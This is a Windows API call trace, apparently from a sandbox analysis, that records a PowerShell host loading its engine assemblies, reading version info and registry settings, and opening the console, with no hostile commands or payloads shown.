	[0634.136] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0634.137] CoTaskMemFree (pv=0x0) 
	[0634.138] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdc48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdc40 | out: pulNumLanguages=0xcdc48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdc40) returned 1
	[0634.138] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdc48, pwszLanguagesBuffer=0x2d77540, pcchLanguagesBuffer=0xcdc40 | out: pulNumLanguages=0xcdc48, pwszLanguagesBuffer=0x2d77540, pcchLanguagesBuffer=0xcdc40) returned 1
	[0634.144] CoTaskMemAlloc (cb=0x24) returned 0x3261c0
	[0634.144] GetUserDefaultLocaleName (in: lpLocaleName=0x3261c0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0634.144] CoTaskMemFree (pv=0x3261c0) 
	[0636.125] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0636.125] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.126] CoTaskMemFree (pv=0x27b790) 
	[0636.128] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0636.128] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.128] CoTaskMemFree (pv=0x27b790) 
	[0636.130] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0636.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.130] CoTaskMemFree (pv=0x27b790) 
	[0636.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0636.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0636.141] SetErrorMode (uMode=0x1) returned 0x1
	[0636.141] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd8c0 | out: lpFileInformation=0xcd8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0636.141] SetErrorMode (uMode=0x1) returned 0x1
	[0636.141] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdb30 | out: lpdwHandle=0xcdb30) returned 0x94c
	[0636.143] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d7add0 | out: lpData=0x2d7add0) returned 1
	[0636.144] VerQueryValueW (in: pBlock=0x2d7add0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdaa8, puLen=0xcdaa0 | out: lplpBuffer=0xcdaa8*=0x2d7ae6c, puLen=0xcdaa0) returned 1
	[0636.144] VerQueryValueW (in: pBlock=0x2d7add0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2d7af48, puLen=0xcda10) returned 1
	[0636.144] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0636.144] CoTaskMemAlloc (cb=0x2e) returned 0x2e7d50
	[0636.144] lstrcpyW (in: lpString1=0x2e7d50, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0636.144] CoTaskMemFree (pv=0x2e7d50) 
	[0636.144] VerQueryValueW (in: pBlock=0x2d7add0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2d7af9c, puLen=0xcda10) returned 1
	[0636.144] lstrlenW (lpString="System.Management.Automation") returned 28
	[0636.145] CoTaskMemAlloc (cb=0x3c) returned 0x330b50
	[0636.145] lstrcpyW (in: lpString1=0x330b50, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0636.145] CoTaskMemFree (pv=0x330b50) 
	[0636.145] VerQueryValueW (in: pBlock=0x2d7add0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2d7aff8, puLen=0xcda10) returned 1
	[0636.145] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0636.145] CoTaskMemAlloc (cb=0x20) returned 0x32d4d0
	[0636.145] lstrcpyW (in: lpString1=0x32d4d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0636.145] CoTaskMemFree (pv=0x32d4d0) 
	[0636.145] VerQueryValueW (in: pBlock=0x2d7add0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2d7b038, puLen=0xcda10) returned 1
	[0636.145] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0636.145] CoTaskMemAlloc (cb=0x44) returned 0x330b50
	[0636.145] lstrcpyW (in: lpString1=0x330b50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0636.145] CoTaskMemFree (pv=0x330b50) 
	[0636.146] VerQueryValueW (in: pBlock=0x2d7add0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2d7b0a0, puLen=0xcda10) returned 1
	[0636.146] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0636.146] CoTaskMemAlloc (cb=0x76) returned 0x2bf820
	[0636.146] lstrcpyW (in: lpString1=0x2bf820, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0636.146] CoTaskMemFree (pv=0x2bf820) 
	[0636.146] VerQueryValueW (in: pBlock=0x2d7add0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2d7b13c, puLen=0xcda10) returned 1
	[0636.146] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0636.146] CoTaskMemAlloc (cb=0x44) returned 0x330b50
	[0636.146] lstrcpyW (in: lpString1=0x330b50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0636.146] CoTaskMemFree (pv=0x330b50) 
	[0636.146] VerQueryValueW (in: pBlock=0x2d7add0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2d7b1a0, puLen=0xcda10) returned 1
	[0636.146] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0636.146] CoTaskMemAlloc (cb=0x58) returned 0x2a74e0
	[0636.146] lstrcpyW (in: lpString1=0x2a74e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0636.146] CoTaskMemFree (pv=0x2a74e0) 
	[0636.146] VerQueryValueW (in: pBlock=0x2d7add0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2d7b21c, puLen=0xcda10) returned 1
	[0636.146] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0636.146] CoTaskMemAlloc (cb=0x20) returned 0x32d4d0
	[0636.146] lstrcpyW (in: lpString1=0x32d4d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0636.147] CoTaskMemFree (pv=0x32d4d0) 
	[0636.147] VerQueryValueW (in: pBlock=0x2d7add0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2d7aec4, puLen=0xcda10) returned 1
	[0636.147] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0636.147] CoTaskMemAlloc (cb=0x66) returned 0x320fa0
	[0636.147] lstrcpyW (in: lpString1=0x320fa0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0636.147] CoTaskMemFree (pv=0x320fa0) 
	[0636.147] VerQueryValueW (in: pBlock=0x2d7add0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x0, puLen=0xcda10) returned 0
	[0636.147] VerQueryValueW (in: pBlock=0x2d7add0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x0, puLen=0xcda10) returned 0
	[0636.147] VerQueryValueW (in: pBlock=0x2d7add0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x0, puLen=0xcda10) returned 0
	[0636.147] VerQueryValueW (in: pBlock=0x2d7add0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd9e8, puLen=0xcd9e0 | out: lplpBuffer=0xcd9e8*=0x2d7ae6c, puLen=0xcd9e0) returned 1
	[0636.147] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0636.147] VerLanguageNameW (in: wLang=0x0, szLang=0x2c73a0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0636.147] CoTaskMemFree (pv=0x2c73a0) 
	[0636.147] VerQueryValueW (in: pBlock=0x2d7add0, lpSubBlock="\\", lplpBuffer=0xcda38, puLen=0xcda30 | out: lplpBuffer=0xcda38*=0x2d7adf8, puLen=0xcda30) returned 1
	[0636.157] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0636.157] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.157] CoTaskMemFree (pv=0x27b790) 
	[0636.163] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0636.163] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.163] CoTaskMemFree (pv=0x27b790) 
	[0636.168] lstrlenW (lpString="䅁") returned 1
	[0638.018] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd908 | out: phkResult=0xcd908*=0x304) returned 0x0
	[0638.020] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd8f8 | out: phkResult=0xcd8f8*=0x308) returned 0x0
	[0638.020] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd988 | out: phkResult=0xcd988*=0x30c) returned 0x0
	[0638.025] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd8cc, lpData=0x0, lpcbData=0xcd8c8*=0x0 | out: lpType=0xcd8cc*=0x1, lpData=0x0, lpcbData=0xcd8c8*=0x56) returned 0x0
	[0638.026] CoTaskMemAlloc (cb=0x5a) returned 0x320f30
	[0638.026] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd89c, lpData=0x320f30, lpcbData=0xcd898*=0x56 | out: lpType=0xcd89c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd898*=0x56) returned 0x0
	[0638.026] CoTaskMemFree (pv=0x320f30) 
	[0638.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0638.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0638.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.079] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0640.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.079] CoTaskMemFree (pv=0x27b790) 
	[0650.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0650.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0654.183] CoTaskMemAlloc (cb=0x104) returned 0x27b8a0
	[0654.183] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b8a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.183] CoTaskMemFree (pv=0x27b8a0) 
	[0654.185] CoTaskMemAlloc (cb=0x104) returned 0x27b8a0
	[0654.185] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b8a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.185] CoTaskMemFree (pv=0x27b8a0) 
	[0654.217] CoTaskMemAlloc (cb=0x104) returned 0x27b8a0
	[0654.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b8a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.218] CoTaskMemFree (pv=0x27b8a0) 
	[0654.219] CoTaskMemAlloc (cb=0x104) returned 0x27b8a0
	[0654.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b8a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.219] CoTaskMemFree (pv=0x27b8a0) 
	[0654.220] CoTaskMemAlloc (cb=0x104) returned 0x27b8a0
	[0654.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b8a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.220] CoTaskMemFree (pv=0x27b8a0) 
	[0659.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0659.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0660.607] CoTaskMemAlloc (cb=0x104) returned 0x27b8a0
	[0660.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b8a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0660.607] CoTaskMemFree (pv=0x27b8a0) 
	[0660.610] CoTaskMemAlloc (cb=0x104) returned 0x27b8a0
	[0660.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b8a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0660.610] CoTaskMemFree (pv=0x27b8a0) 
	[0662.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0662.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0675.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0675.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0677.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0677.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0685.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0685.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0695.996] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0695.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0695.996] CoTaskMemFree (pv=0x27bac0) 
	[0701.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0701.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0701.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0703.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0703.462] SetErrorMode (uMode=0x1) returned 0x1
	[0703.462] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcd860 | out: lpFileInformation=0xcd860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0703.462] SetErrorMode (uMode=0x1) returned 0x1
	[0716.210] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0716.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0716.210] CoTaskMemFree (pv=0x27bac0) 
	[0716.211] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0716.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0716.211] CoTaskMemFree (pv=0x27bac0) 
	[0716.211] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0716.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0716.212] CoTaskMemFree (pv=0x27bac0) 
	[0718.292] CoCreateGuid (in: pguid=0xcdc28 | out: pguid=0xcdc28*(Data1=0xdfb29f6, Data2=0x8d46, Data3=0x4af3, Data4=([0]=0xaf, [1]=0x7e, [2]=0x55, [3]=0xda, [4]=0xf5, [5]=0xe3, [6]=0x1f, [7]=0xfb))) returned 0x0
	[0718.295] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0718.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0718.295] CoTaskMemFree (pv=0x27bac0) 
	[0718.298] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0718.299] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0718.299] CoTaskMemFree (pv=0x27bac0) 
	[0718.301] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0718.301] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0718.302] CoTaskMemFree (pv=0x27bac0) 
	[0718.324] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0719.913] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcd8d0 | out: lpConsoleScreenBufferInfo=0xcd8d0) returned 1
	[0719.935] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0720.091] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcd8d0 | out: lpConsoleScreenBufferInfo=0xcd8d0) returned 1
